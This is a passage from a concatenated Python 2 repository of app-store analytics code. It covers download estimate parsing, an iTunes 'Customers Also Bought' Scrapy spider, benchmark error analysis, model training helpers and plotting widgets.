debug_data.ix[debug_data.Customize.isnull()|(debug_data.Customize.astype(str)=='R'),'Customize']='N'
debug_data.ix[debug_data.Customize=='A','App ID']=1
debug_data["Feed"] = debug_data.Feed.apply(lambda x: feed_dict[x])
debug_data.columns = ['store_id','feed','end_date','day','app_id','actual','customized']
debug_data.app_id = debug_data.app_id.astype(int)
debug_data.actual = debug_data.actual.astype(int)
if data is None:
data = debug_data
else:
data = data.append(debug_data, ignore_index=True)
print 'dropping duplicates...'
data.drop_duplicates(inplace=True)
print 'aggregating...'
data_agg = data.groupby(['store_id','feed','end_date','app_id'], as_index=False)['actual'].sum()
data_agg['customized'] = data.groupby(['store_id','feed','end_date','app_id'], as_index=False).last()['customized']
data_agg.actual = data_agg.actual.astype(int)
print 'done!'
return data_agg
def parse_estimates_ios(input_path, estimate_column='estimate'):
files = glob.glob(input_path)
data = None
for file in files:
print 'parsing '+file+'...'
if data is None:
data = pd.read_csv(file)
else:
data = data.append(pd.read_csv(file), ignore_index=True)
print 'melting...'
data = pd.melt(data, id_vars=['app_id','store_id','end_date'],
value_vars = ['iphone_free','iphone_paid','iphone_revenue','ipad_free','ipad_paid','ipad_revenue'])
data.columns = ['app_id','store_id','end_date','feed',estimate_column]
print 'done!'
return data
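
# Minimal usage sketch (glob patterns below are assumptions):
#
# actuals = parse_debug_files_ios('debug/*_debug.csv')
# estimates = parse_estimates_ios('estimates/*.csv', estimate_column='estimate')
# merged = actuals.merge(estimates, on=['store_id', 'feed', 'end_date', 'app_id'])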
<file_sep>/customers-also-bought/lib/customer_scrapers/customer_scrapers/spiders/apple.py
# -*- coding: utf-8 -*-
import json
import pandas
import re
import scrapy
from bs4 import BeautifulSoup
from ..items import CustomerScrapersItem
from scrapy.http import Request
from scrapy.utils.project import get_project_settings
ISO_CODES = {
143441: u'us',
143455: u'ca',
143462: u'jp'
}
class AppleSpider(scrapy.Spider):
"""
Spider to crawl iTunes pages and scrape the 'Customers Also Bought' list.
"""
name = "apple"
country_external_id = get_project_settings()['COUNTRY_EXTERNAL_ID']
start_ids_file_path = 'start_ids_{iso_code}.csv'.format(iso_code=ISO_CODES[country_external_id])
start_app_ids = pandas.read_csv(start_ids_file_path, index_col=0)['external_id'].tolist()
allowed_domains = ["itunes.apple.com"]
base_url = 'https://itunes.apple.com/{iso_code}/app/name/id'.format(iso_code=ISO_CODES[country_external_id])
base_suffix = '?mt=8'
start_urls = [base_url + str(current_id) + base_suffix for current_id in start_app_ids]
n_page_to_visit = 1
max_n_page_to_visit = 1E9
parsed_ids = set(start_app_ids)
def parse(self, response):
"""
Parse a app details page.
:param response: Response object
:return: Yields items (processed) and new Requests (leading to new calls of this method)
"""
(external_id, customers_also_bought, app_name, has_in_app_purchases,
price, genre_names) = self._parse_json_response(response)
self.parsed_ids.add(external_id) # storing retrieved external_id in parsed_ids
# Yield all external_id cab_external_id combinations
for cab_rank, cab_external_id in enumerate(customers_also_bought):
yield self._construct_item(external_id, app_name, has_in_app_purchases, price, genre_names, cab_rank,
cab_external_id)
        # Yield new URLs to follow from customers_also_bought
        for cab_external_id in customers_also_bought:
            if (cab_external_id not in self.parsed_ids) and (self.n_page_to_visit < self.max_n_page_to_visit):
                self.parsed_ids.add(cab_external_id)
                self.n_page_to_visit += 1
                new_url = self._get_new_url(cab_external_id)
                yield Request(new_url, callback=self.parse)
def _parse_json_response(self, response):
"""
Parse the JSON response of the iTunes page.
:param response: Response object
:return: (external ID, list with external IDs of similar apps)
"""
soup = BeautifulSoup(response.body)
page_data_script = soup.findAll(text=re.compile("its\.serverData"))
target_string = re.search(r'^\s*its\.serverData\s*=\s*({.*?})\s*$',
page_data_script[0], flags=re.DOTALL | re.MULTILINE).group(1)
json_page_data = json.loads(target_string)
app_id = self._get_external_id(json_page_data)
app_details = self._get_app_details(json_page_data, app_id)
app_name = self._get_app_name(app_details)
has_in_app_purchases = self._get_has_in_app_purchases(app_details)
customers_also_bought = self._get_customers_also_bought_list(json_page_data)
price = self._get_price(app_details)
genre_names = self._get_genre_names(app_details)
return app_id, customers_also_bought, app_name, has_in_app_purchases, price, genre_names
def _get_external_id(self, json_page_data):
"""
Parse JSON page data and return external ID.
:param json_page_data: JSON data
:return: External ID
"""
return int(json_page_data['storePlatformData']['product-dv-product']['results'].keys()[0])
def _get_app_details(self, json_page_data, app_id):
"""
Get the app details from a JSON dict with the page data.
:param json_page_data: JSON data
:param app_id: Int with external app ID
:return: Dictionary with app details
"""
return json_page_data['storePlatformData']['product-dv-product']['results'][str(app_id)]
def _get_app_name(self, app_details):
"""
Get name from app_details.
:param app_details: Dictionary with app details
:return: App name
"""
try:
app_name = app_details['name']
except KeyError:
app_name = None
return app_name
def _get_has_in_app_purchases(self, app_details):
"""
Get has_in_app_purchases from app_details.
:param app_details: Dictionary with app details
:return: Boolean
"""
try:
has_in_app_purchases = app_details['hasInAppPurchases']
except KeyError:
has_in_app_purchases = None
return has_in_app_purchases
def _get_customers_also_bought_list(self, json_page_data):
"""
Get list with IDs of apps that the customer also bought.
:param json_page_data: JSON data
:return: list with external IDs
"""
software_page_data = json_page_data['pageData']['softwarePageData']
        try:
            # Accessing the results raises a KeyError when the product data is
            # missing, in which case we fall back to an empty list below.
            json_page_data['storePlatformData']['product-dv-product']['results'].keys()
            if 'customersAlsoBoughtApps' in software_page_data.keys():
customers_also_bought = software_page_data['customersAlsoBoughtApps']
else:
customers_also_bought = []
except KeyError:
customers_also_bought = []
return customers_also_bought
def _get_price(self, app_details):
"""
Get price from app_details
:param app_details: Dictionary with app details
:return: Price of app
"""
try:
price = app_details['offers'][0]['price']
except KeyError:
price = None
return price
def _get_genre_names(self, app_details):
"""
Get genre names (categories) from app_details
:param app_details: Dictionary with app details
:return: List with genre names
"""
try:
genre_names = app_details['genreNames']
except KeyError:
genre_names = []
return genre_names
def _construct_item(self, external_id, app_name, has_in_app_purchases, price, genre_names, cab_rank,
cab_external_id):
"""
Construct a new Item with scraped data.
:param external_id: ID of scraped app
:param cab_external_id: list with IDs of apps that customers also bought
:param cab_rank: Rank of the app
:return: Item object
"""
item = CustomerScrapersItem()
item['country_external_id'] = self.country_external_id
item['external_id'] = external_id
item['cab_external_id'] = cab_external_id
item['cab_rank'] = cab_rank
item['price'] = price
item['genre_names'] = genre_names
item['app_name'] = app_name
item['has_in_app_purchases'] = has_in_app_purchases
return item
def _get_new_url(self, external_id):
"""
Construct new URL from an external ID.
:param external_id: External ID
:return: URL to scrape
"""
return self.base_url + str(external_id) + self.base_suffix
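
# Run sketch, from the scrapy project root (the output file name is just an
# example). COUNTRY_EXTERNAL_ID must be set in the project settings and a
# matching start_ids_<iso>.csv (e.g. start_ids_us.csv for 143441) must exist:
#
#   scrapy crawl apple -o customers_also_bought.json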
<file_sep>/evaluation/py/test_category_rank_range_errors.py
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
DATA_DIR = '/Users/perezrafael/appannie/data/benchmark'
def test_static_ranks():
file = '%s/benchmark_data_143441_2013-07-01.csv.bz2'%DATA_DIR
df = pd.read_csv(file, compression='bz2')
df = df[df['actual']>0]
df['iphone_estimate'] = df['iphone_estimate'].fillna(0.0)
df['ipad_estimate'] = df['ipad_estimate'].fillna(0.0)
df['estimate'] = df['iphone_estimate'] + df['ipad_estimate']
df['abs_error'] = (df['actual'] - df['estimate']).abs()
df['rel_error'] = df['abs_error']/df['actual']
iphone_df = df.drop_duplicates(cols=['store_id', 'category_id', 'feed_id', 'app_id', 'iphone_rank'])
iphone_df = iphone_df[iphone_df['iphone_rank']>0]
iphone_df = iphone_df[np.isnan(iphone_df['ipad_rank']) == True]
winner_top60 = 0.0
winner_everything_else = 0.0
apps = []
for n, g in iphone_df.groupby(['store_id', 'feed_id', 'app_id']):
describe = g.describe()
if describe['rel_error']['count']<2.0:
continue
if describe['iphone_rank']['min']>60:
continue
if describe['iphone_rank']['max']<60:
continue
print g
sorted = g.sort(columns='rel_error', ascending=True)
g['sbe_error'] = describe['rel_error']['mean']
g['max_error_difference'] = describe['rel_error']['max'] - describe['rel_error']['min']
g['max_rank_difference'] = describe['iphone_rank']['max'] - describe['iphone_rank']['min']
g['is_min_error'] = 'no'
g['is_min_error'][g['rel_error'] == g['rel_error'].min()] = 'yes'
g['is_min_error_in_top60'] = 'no'
g['is_min_error_in_top60'][(g['is_min_error']=='yes') & (g['iphone_rank']<61)] = 'yes'
if sorted['iphone_rank'].values[0] == g['iphone_rank'].min():
winner_top60 += 1.0
g['lowest_error'] = 'Top60'
else:
winner_everything_else +=1.0
g['lowest_error'] = 'NoTop60'
apps.append(g)
print winner_top60
print winner_everything_else
apps = pd.concat(apps)
apps.to_csv('test_app_rank_error.csv', index=False)
#ipad_df = df.drop_duplicates(cols=['store_id', 'category_id', 'feed_id', 'app_id', 'ipad_rank'])
#ipad_df = ipad_df[ipad_df['ipad_rank']>0
pass
if __name__ == '__main__':
    test_static_ranks()
<file_sep>/audience/related_apps/create_app_category.sql
CREATE TABLE app_category (
app_id integer,
category_id integer,
period_start date,
period_end date,
PRIMARY KEY (app_id,category_id, period_start, period_end)
);
<file_sep>/exact-matching-improvement/lib/feature_company.py
__author__ = 'jjanssen'
import config as cf
suffix_list = ['AG','srl','spa','SA','kft','sl','sas','ab','INC','llc','Games',
'ltd','Software','Apps','Media','Studios','Mobile','Studio',
'Technologies','Limited','Solutions','GmbH','Union','Labs','Bank',
'Entertainment','Digital','Technology','Co','Group','Interactive',
'App','Publishing','Productions','game','Pvt','Development','Corporation',
'Systems','Team','Tech','Company','Federal','Soft','Design','Corp','Services',
'Magazine','Network','Android','COLTD','Srl','International','Dev','A','Lab','web','Consulting','Pty']
suffix_list = [e.lower() for e in suffix_list]
def clean_punctuation(text):
result = []
if text is not None:
text_to_list = text.lower().split()
for text_element in text_to_list:
text_element = text_element.decode('utf-8')
result.append(text_element.translate(cf.removal_translate_table))
text = " ".join(result)
return text
def clean_company_suffix(text):
result = []
if text is not None:
company_name_to_list = text.lower().split()
for name_element in company_name_to_list:
if name_element not in suffix_list:
result.append(name_element)
text = " ".join(result)
return text
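
# Minimal usage sketch for clean_company() below (assumes
# cf.removal_translate_table only strips punctuation). Note that generic
# words such as 'Entertainment' and 'Ltd' count as suffixes and are removed:
#
# >>> clean_company({'company': 'Rovio Entertainment Ltd.'})['cleaned_company']
# 'rovio'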
def clean_company(row):
    """Add a 'cleaned_company' key to the row: the lowercased,
    punctuation-free company name with common suffixes removed."""
if row['company'] is not None:
text = row['company']
text_cleaned_punctuation = clean_punctuation(text)
row['cleaned_company'] = clean_company_suffix(text_cleaned_punctuation)
else:
row['cleaned_company'] = row['company']
return row<file_sep>/aa_au_model/correction/model.py
__author__ = 'hgriffioen'
import pandas as pd
import pickle
import process
# `import sklearn` alone does not expose these submodules; import explicitly.
import sklearn.cross_validation
import sklearn.grid_search
import utils
def split_train_test(y, do_split_stratified=True, **kwargs):
"""
Get indexes to split y in train and test sets.
:param y: Labels of samples
:param do_split_stratified: Use StratifiedShuffleSplit (else ShuffleSplit)
:param kwargs: Input params for StratifiedShuffleSplit or ShuffleSplit
:return: (train indexes, test indexes)
"""
if do_split_stratified:
data_splitter = sklearn.cross_validation.StratifiedShuffleSplit(y, n_iter=1,
**kwargs)
else:
        # The old sklearn API expects the number of samples here, not the labels.
        data_splitter = sklearn.cross_validation.ShuffleSplit(len(y), n_iter=1,
                                                              **kwargs)
train_ix, test_ix = data_splitter.__iter__().next()
return train_ix, test_ix
def train_model(X, y, estimator, random_state, test_size=0.2, n_folds=5, **kwargs):
"""
Train a model, get test score and re-fit on all data.
:param X: Input data
:param y: Labels
:param estimator: Estimator to train
:param random_state: Random state for kfold
:param test_size: Size of test set
:param n_folds: Number of folds
:param kwargs: Keyword arguments for sklearn.grid_search.GridSearchCV
:return: Tuple with best estimator and test score
"""
train_ix, test_ix = split_train_test(y, test_size=test_size, random_state=random_state)
# Perform grid_search on training set.
kfold = sklearn.cross_validation.StratifiedKFold(y.iloc[train_ix], n_folds=n_folds, shuffle=True,
random_state=random_state)
grid = sklearn.grid_search.GridSearchCV(estimator, cv=kfold, **kwargs)
grid.fit(X.iloc[train_ix, :], y.iloc[train_ix])
# Determine score on test set.
test_score = grid.score(X.iloc[test_ix, :], y.iloc[test_ix])
best_model = grid.best_estimator_
best_model.fit(X, y) # Fit to all data.
return best_model, test_score
def get_model_path(start_date, end_date, modality):
"""
Get path to model to save to or load from.
:param start_date: datetime with start date
:param end_date: datetime with end date
:param modality: Dictionary with modality and value used (e.g. {'gender': 'male', 'age_bin': '13-24})
:return: string with file path
"""
period_str = '_'.join((start_date.strftime('%Y%m%d'),
end_date.strftime('%Y%m%d')))
modality_str = '_'.join(['%s=%s' % (key, val) for key, val in modality.items()])
file_name = '_'.join(('model', modality_str, period_str)) + '.pickle'
return 'data/model/' + file_name
def save_model(model_results, start_date, end_date, modality):
"""
Save model results to file. Path is determined using get_model_path().
:param model_results: Results to save
:param start_date: datetime with start date
:param end_date: datetime with end date
:param modality: Dictionary with modality and value used (e.g. {'gender': 'male', 'age_bin': '13-24})
:return: None
"""
model_path = get_model_path(start_date, end_date, modality)
with open(model_path, 'w') as f:
pickle.dump(model_results, f)
def load_model(start_date, end_date, modality):
"""
Load model results from file. Path is determined using get_model_path().
:param start_date: datetime with start date
:param end_date: datetime with end date
:param modality: Dictionary with modality and value used (e.g. {'gender': 'male', 'age_bin': '13-24})
:return: model results
"""
model_path = get_model_path(start_date, end_date, modality)
with open(model_path, 'r') as f:
model_results = pickle.load(f)
return model_results
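
# Minimal training sketch (estimator, data and grid are assumptions; the
# module targets the old sklearn.cross_validation / sklearn.grid_search API):
#
# import pandas as pd
# from sklearn.linear_model import LogisticRegression
#
# X = pd.DataFrame({'f1': range(100), 'f2': range(100, 200)})
# y = pd.Series([0, 1] * 50)
# best_model, test_score = train_model(X, y, LogisticRegression(),
#                                      random_state=0,
#                                      param_grid={'C': [0.1, 1.0, 10.0]})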
def predict_joint_proba(data, estimator_1, estimator_2, bundle_ids_1=None, bundle_ids_2=None, joint_classes=None):
"""
Predict the joint independent probabilities for two estimators. Order of columns:
(not 1, not 2), (not 1, 2), (1, not 2), (1, 2)
:param data: Data to predict with
:param estimator_1: Object with method predict_proba
:param estimator_2: Object with method predict_proba
:param bundle_ids_1: Bundle ID's to use for alignment for estimator 1 (if None, don't align)
    :param bundle_ids_2: Bundle ID's to use for alignment for estimator 2 (if None, don't align)
:param joint_classes: Joint classes to set as columns (default = ['0,0', '0,1', '1,0', '1,1'])
:return: DataFrame with joint probabilities
"""
if joint_classes is None:
joint_classes = ['0,0', '0,1', '1,0', '1,1']
if bundle_ids_1 is not None:
aligned_data_1 = process.align_bundle_ids(data, bundle_ids_1)
else:
aligned_data_1 = data
if bundle_ids_2 is not None:
aligned_data_2 = process.align_bundle_ids(data, bundle_ids_2)
else:
aligned_data_2 = data
probability_1 = pd.DataFrame(estimator_1.predict_proba(aligned_data_1), index=aligned_data_1.index)
probability_2 = pd.DataFrame(estimator_2.predict_proba(aligned_data_2), index=aligned_data_2.index)
assert (probability_1.index == probability_2.index).all(), 'Indexes of probabilities should be the same'
joint_probability = pd.concat([probability_2.multiply(probability_1[0], axis='rows'),
probability_2.multiply(probability_1[1], axis='rows')],
axis=1)
joint_probability.columns = joint_classes
return joint_probability
def predict_weekly_proba(usage, device_ids, week_end, *args, **kwargs):
"""
Weekly wrapper for predict_joint_proba().
:param usage: Usage (see data.load_usage())
:param device_ids: List of relevant device ID's
:param week_end: End date of week
:param kwargs: Keyword arguments for predict_joint_proba except for data
:return: DataFrame with weekly joint probability for device ID's
"""
week_start = utils.get_start_date(week_end, 'weekly')
weekly_data = process.get_usage_per_device(usage, device_ids, week_start, week_end)
joint_probability = predict_joint_proba(weekly_data, *args, **kwargs)
return joint_probability
def predict_monthly_proba(usage, device_ids, month_end, *args, **kwargs):
"""
Monthly wrapper for predict_joint_proba() to get average monthly probabilities.
:param usage: Usage (see data.load_usage())
:param device_ids: List of relevant device ID's
:param month_end: End date of month
:param kwargs: Keyword arguments for predict_joint_proba except for data
:return: DataFrame with monthly joint probability for device ID's
"""
weekly_probability = predict_proba_in_month(usage, device_ids, month_end, *args,
**kwargs)
monthly_probability = weekly_probability.groupby('device_id').aggregate('mean')
n_times_present = weekly_probability.device_id.value_counts()
n_weeks_in_month = len(utils.get_weekly_end_dates_in_month(month_end))
valid_device_ids = n_times_present[n_times_present == n_weeks_in_month].index
monthly_probability = monthly_probability.ix[valid_device_ids]
return monthly_probability
def predict_proba_in_month(usage, device_ids, month_end, *args, **kwargs):
"""
Monthly wrapper for predict_weekly_proba() to get all weekly probabilities in a month.
:param usage: Usage (see data.load_usage())
:param device_ids: List of relevant device ID's
:param month_end: End date of month
:param kwargs: Keyword arguments for predict_joint_proba except for data
:return: DataFrame with weekly joint probabilities in the month for device ID's
"""
week_end_dates = utils.get_weekly_end_dates_in_month(month_end)
probability_list = []
for week_end in week_end_dates:
weekly_probability = predict_weekly_proba(usage, device_ids, week_end, *args,
**kwargs)
weekly_probability['end_date'] = week_end
probability_list.append(weekly_probability.reset_index())
return pd.concat(probability_list, axis=0, ignore_index=True)<file_sep>/financial-product-benchmark/automated-QA/classes.py
from IPython.html import widgets
from IPython.display import display, clear_output
from collections import OrderedDict
import matplotlib.pyplot as plt
import datetime
import seaborn as sns
sns.set(font="serif")
from itertools import product
def plot_curves(store, country, end_date, device_feed, data, min_rank=1, max_rank=1000, ax=None, scale='log'):
sel = (data.store == store)&(data.country == country)&\
(data.end_date == end_date)&(data.device_feed == device_feed)&\
(data['rank']>=min_rank)&(data['rank']<=max_rank)
    if ax is None:
        f,ax = plt.subplots()
        f.set_size_inches(7,4)
ax.plot(data[sel]['rank'],data[sel].value_cla,'b-',label='classic')
ax.plot(data[sel]['rank'],data[sel].value_fin,'g-',label='financial')
ax.legend()
ax.set_xscale(scale)
ax.set_yscale(scale)
ax.set_xlim(min_rank,max_rank)
ax.set_title(store+' - '+country+' - '+end_date+' - '+device_feed,fontsize=16)
ax.set_xlabel('rank',fontsize=12)
ax.set_ylabel('estimate',fontsize=12)
return ax
class CurveViewer(object):
def __init__(self, data):
self.data = data
self.updating_all_lists = False
self.create_dropdowns()
self.populate_stores_dropdown()
self.displayed_data = None
def create_dropdowns(self):
self.stores_dropdown = widgets.DropdownWidget()
self.stores_dropdown.on_trait_change(self.change_handler, 'value')
self.countries_dropdown = widgets.DropdownWidget()
self.countries_dropdown.on_trait_change(self.change_handler, 'value')
self.end_dates_dropdown = widgets.DropdownWidget()
self.end_dates_dropdown.on_trait_change(self.change_handler, 'value')
self.device_feeds_dropdown = widgets.DropdownWidget()
self.device_feeds_dropdown.on_trait_change(self.change_handler, 'value')
self.dropdown_container = widgets.ContainerWidget()
self.dropdown_container.children = [self.stores_dropdown,self.countries_dropdown,
self.end_dates_dropdown,self.device_feeds_dropdown]
self.dropdown_container._css = {'': {'width': '100%', 'flex-direction': 'row',
'justify-content': 'center', 'align-items': 'center',
'margin-bottom': '5px'},
'.widget-hbox-single': {'margin': '0px'}}
def change_handler(self, *args):
if self.updating_all_lists == False:
self.updating_all_lists = True
self.populate_countries_dropdown()
self.populate_end_dates_dropdown()
self.populate_device_feeds_dropdown()
self.execute_function()
self.updating_all_lists = False
def populate_stores_dropdown(self):
stores = self.data.store.unique()
self.stores_dropdown.values=OrderedDict(zip(stores,stores))
def populate_countries_dropdown(self, *args):
self.stores_sel = self.data.store == self.stores_dropdown.value
countries = self.data[self.stores_sel].country.unique()
self.countries_dropdown.values = OrderedDict(zip(countries,countries))
def populate_end_dates_dropdown(self, *args):
self.end_dates_sel = self.stores_sel&(self.data[self.stores_sel].country == self.countries_dropdown.value)
end_dates = self.data[self.end_dates_sel].end_date.unique()
self.end_dates_dropdown.values = OrderedDict(zip(end_dates,end_dates))
def populate_device_feeds_dropdown(self, *args):
self.device_feeds_sel = self.end_dates_sel&(self.data[self.end_dates_sel].end_date == self.end_dates_dropdown.value)
device_feeds = self.data[self.device_feeds_sel].device_feed.unique()
self.device_feeds_dropdown.values = OrderedDict(zip(device_feeds,device_feeds))
def execute_function(self, *args):
data_sel = self.device_feeds_sel&(self.data[self.device_feeds_sel].device_feed == self.device_feeds_dropdown.value)
store = self.stores_dropdown.value
country = self.countries_dropdown.value
end_date = self.end_dates_dropdown.value
device_feed = self.device_feeds_dropdown.value
clear_output(wait=True)
self.displayed_data = self.data[data_sel]
plot_curves(store, country, end_date, device_feed, self.displayed_data)
def _ipython_display_(self):
"""
Called when display() or pyout is used to display the GUI.
"""
self.dropdown_container._ipython_display_()<file_sep>/weekly_weights/preview_weights.py
'''
Created on May 22, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import config
import sys
if __name__ == '__main__':
'''python preview_weights.py ios /path/to/file.csv
argv[1] = platform (ios or android)
argv[2] = file
OUTPUT: csv with preview_weights
pdf charts for visualization
This script will load the csv resulting from weights.py,
then average all the units per weekday, and divide by the average of all units.
    This results in preview weights for the period covered by the file
'''
platform = sys.argv[1]
file = sys.argv[2]
plot = False
df = pd.read_csv(file)
period_mean = df[['unit', 'store_id', 'units']].groupby(['unit', 'store_id']).mean().reset_index()
period_mean.rename(columns={'units':'yearly_mean'}, inplace=True)
mean_weights = df[['count', 'weight', 'store_id', 'unit', 'units', 'weekday', 'weekly_mean']].groupby(['unit', 'store_id', 'weekday']).mean().reset_index()
mean_weights = mean_weights.merge(period_mean, on=['unit', 'store_id'])
mean_weights['preview_weight'] = (mean_weights['units']*1.0)/mean_weights['yearly_mean']
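    # Hypothetical example: if a store's Monday downloads average 110 while its
    # period-wide average is 100, Monday's preview weight is 110/100 = 1.1.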
total_countries = mean_weights['store_id'].drop_duplicates().shape[0]
gdf1 = mean_weights.groupby('store_id')
if plot:
fig, axarr = plt.subplots(total_countries, 2)
weekdays = mean_weights[['weekday']].drop_duplicates()
count=0
result = []
for n1, g1 in gdf1:
if platform == 'ios':
country = config.IOS_STORES_DICT[n1]
elif platform == 'android':
country = config.ANDROID_STORES_DICT[n1]
downloads = g1[g1['unit']=='downloads']
downloads = downloads.merge(weekdays, on='weekday', how='right')
downloads['preview_weight'] = downloads['preview_weight'].fillna(1.0)
downloads['store_id'] = np.int64(n1)
downloads['unit'] = 'downloads'
if plot:
axarr[count,0].plot(downloads['weekday'], downloads['preview_weight'], linestyle='-', marker='o')
axarr[count,0].set_title('%s downloads'%country)
axarr[count,0].set_ylim(0.8, 1.2)
usd = g1[g1['unit']=='usd']
usd = usd.merge(weekdays, on='weekday', how='right')
usd['preview_weight'] = usd['preview_weight'].fillna(1.0)
usd['store_id'] = np.int64(n1)
usd['unit'] = 'usd'
if plot:
axarr[count,1].plot(usd['weekday'], usd['preview_weight'], linestyle='-', marker='o')
axarr[count,1].set_title('usd')
axarr[count,1].set_ylim(0.8, 1.2)
result.append(downloads)
result.append(usd)
count +=1
result = pd.concat(result)
result['weekday'] = np.int64(result['weekday'])
result['store_id'] = np.int64(result['store_id'])
result.to_csv('preview_weights_%s.csv'%platform, index=False)
if plot:
plt.setp([a.get_xticklabels() for a in axarr[0:, :].reshape(1,total_countries*2)[0]], visible=False)
fig.set_size_inches(10, total_countries*2)
fig.tight_layout()
plt.savefig('preview_weights_%s.pdf'%platform)
#plt.show()<file_sep>/audience/legacy_experiments/predict_language.py
# -*- coding: utf-8 -*-
from guess_language import guess_language
import psycopg2
import argparse
def guess_lang(text):
try:
return guess_language(text.decode('utf-8'))
except:
return ''
def main():
    parser = argparse.ArgumentParser(description='Predict the language of a text in db and put it into p_language for that database')
parser.add_argument('-t','--target_table', help='Table to update name in db', required=True)
parser.add_argument('-i','--index_table', help='Main review table', required=True)
parser.add_argument('-s','--store_id', help='Store ID', type=int, required=True)
parser.add_argument('-f','--field', help='Column name with the text we want to predict language', required=True)
parser.add_argument('-c','--connection', help='Connection string to pass to postgres', required=True)
args = vars(parser.parse_args())
#CONN=psycopg2.connect('dbname=aa_reviews_android user=aa host=10.38.48.144 port=5432')
conn = psycopg2.connect(args['connection'])
cur1 = conn.cursor()
conn2 = psycopg2.connect(args['connection'])
cur2 = conn2.cursor()
target_table = args['target_table']
index_table = args['index_table']
store_id = args['store_id']
column = args['field']
if column=='reviewer':
query1 = 'SELECT t.reviewer FROM %s t, %s i WHERE t.p_language=%%s and t.reviewer=i.reviewer and i.store_id=%%s'%(target_table, index_table)
query2 = 'UPDATE %s SET p_language=%%s WHERE reviewer=%%s'%(target_table)
else:
query1 = 'SELECT t.%s, t.id FROM %s t, %s i WHERE t.p_language=%%s and t.id=i.id and i.store_id=%%s'%(column, target_table, index_table)
query2 = 'UPDATE %s SET p_language=%%s WHERE id=%%s'%(target_table)
params1 = ('-', store_id)
print cur1.mogrify(query1, params1)
cur1.execute(query1, params1)
for row in cur1:
        if row is None or row[0] is None:
            continue
p_language = guess_lang(row[0])
if column=='reviewer':
params2 = (p_language, row[0])
else:
params2 = (p_language, row[1])
print cur2.mogrify(query2, params2)
cur2.execute(query2, params2)
conn2.commit()
conn.close()
conn2.close()
if __name__ == '__main__':
main()
<file_sep>/publisher_cv/compare_pc_estimates.py
import pandas as pd
import numpy as np
def main():
store_id = '143441'
dir = '/Users/perezrafael/appannie/data/estimates_public_companies'
file = '%s/res_stg_%s_v1.csv'%(dir, store_id)
df = pd.read_csv(file)
df['t1e'] = df['t1e'].fillna(0)
    df['t2e'] = df['t2e'].fillna(0)
df['estimate_financial'] = df['t1e'] + df['t2e']
df['estimate_original'] = df['Daily.Estimate']
df2 = df.groupby(['store_id', 'feed_id', 'app_id', 'date']).mean().reset_index()
df2 = df2[['store_id', 'feed_id', 'app_id', 'date', 'estimate_financial', 'estimate_original']]
df = df[['store_id', 'feed_id', 'app_id', 'date', 'category_id', 'iphone_rank', 'ipad_rank', 'actual']]
df = df.merge(df2, on=['store_id', 'feed_id', 'app_id', 'date'])
del df2
df['rank_range'] = '201 to end'
df['rank_range'][(df['iphone_rank']<201) | (df['ipad_rank']<201)] = '21 to 200'
df['rank_range'][(df['iphone_rank']<21) | (df['ipad_rank']<21)] = '11 to 20'
df['rank_range'][(df['iphone_rank']<11) | (df['ipad_rank']<11)] = '1 to 10'
df['estimates_diff'] = df['estimate_financial'] - df['estimate_original']
df['estimates_abs_diff'] = df['estimates_diff'].abs()
df['estimates_rel_diff'] = (df['estimates_diff']*1.0) / df['estimate_original']
df['estimates_abs_rel_diff'] = df['estimates_rel_diff'].abs()
df.to_csv('%s/estimates_comparison_%s.csv'%(dir, store_id), index=False)
if __name__ == '__main__':
main()
<file_sep>/int-vs-m-benchmark/lib/my_functions.py
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from distimo_clients import mysqldb
from collections import OrderedDict
import lib.my_classes as mc
from IPython.display import display, clear_output
def get_value(rank, curve_model):
if type(curve_model).__name__ == 'dict':
rank = str(rank)
result = curve_model[rank] if rank in curve_model else min(curve_model.values())
else:
for r, param in curve_model:
if r > rank:
break
result = param[0] * (rank ** param[1])
return result
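# A sketch of the two supported model shapes (made-up numbers):
#   dict lookup:  get_value(3, {'1': 100.0, '2': 60.0, '3': 45.0}) -> 45.0
#                 (ranks missing from the dict fall back to the smallest stored value)
#   power law:    model = [(1, (200.0, -0.8)), (100, (500.0, -1.0))]
#                 get_value(5, model)   -> 200.0 * 5 ** -0.8    (first segment)
#                 get_value(150, model) -> 500.0 * 150 ** -1.0  (last segment whose
#                                          threshold is <= the rank)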
def plot_weekly_model(obj, data, sel_columns, scale='log'):
def plot_axes():
clear_output(wait=True)
f,axes = plt.subplots(1, 2, sharey=True)
f.set_size_inches(15, 5)
f.suptitle(' - '.join(data[sel_columns].astype(str).values[0]), fontsize=16)
cats = [obj.func_container.children[0].value,
obj.func_container.children[1].value]
max_estimates = []
for i,cat in enumerate(cats):
ax = axes[i]
sel_data = data[data['category'] == cat]
model = eval(sel_data.model.values[0])
rank_data = eval(sel_data.weekly_avg.values[0])
ranking = np.arange(1,sel_data.max_rank.values+1)
df = pd.DataFrame(ranking, columns = ['ranking'])
df['estimate'] = df['ranking'].apply(get_value, args=(model,))
df['weekly_avg'] = df['ranking'].apply(lambda x: rank_data[str(x)] if rank_data.has_key(str(x)) else None)
ax.plot(df['ranking'],df['estimate'], label='estimate')
ax.plot(df['ranking'],df['weekly_avg'], 'xr', label = 'weekly_avg')
max_estimates.append(df['estimate'].max())
ax.set_xscale(scale)
ax.set_yscale(scale)
ax.set_title(cat)
axes[0].set_ylim(0, max(max_estimates)+10)
categories = data.category.unique().tolist()
if len(obj.container.children) == 1:
obj.func_container = mc.widgets.ContainerWidget()
obj.func_container._css = {'': {'width': '100%', 'flex-direction': 'row',
'justify-content': 'center', 'align-items': 'center',
'margin-bottom': '5px'},
'.widget-hbox-single': {'margin': '5px'}}
obj.container.children = tuple(list(obj.container.children)+[obj.func_container])
children =[]
for i in range(2):
dropdown = mc.Dropdown()
dropdown.values = OrderedDict(zip(categories, categories))
if i == 0:
dropdown.value = 'Top Overall'
dropdown.on_trait_change(plot_axes, 'value')
children.append(dropdown)
obj.func_container.children = children
plot_axes()
<file_sep>/aa_au_model/lib/sample_monitoring.py
__author__ = 'jjanssen'
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from itertools import count
def construct_feature_matrix(df, feature):
"""
creates a binary matrix which indicates whether the index has a certain property
:param df: a dataframe containing at least a device_id and a 'feature' per row
:param feature: the column name of the feature
:return: a dataframe containing: per device_id (row) whether its has (1) or has not (0) a feature (column)
"""
df['is_feature'] = 1
result = pd.pivot_table(data=df, index='device_id', columns=[feature], values='is_feature', fill_value=0)
return result
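# A tiny sketch of the output (hypothetical device IDs):
#   df = pd.DataFrame({'device_id': ['a', 'a', 'b'],
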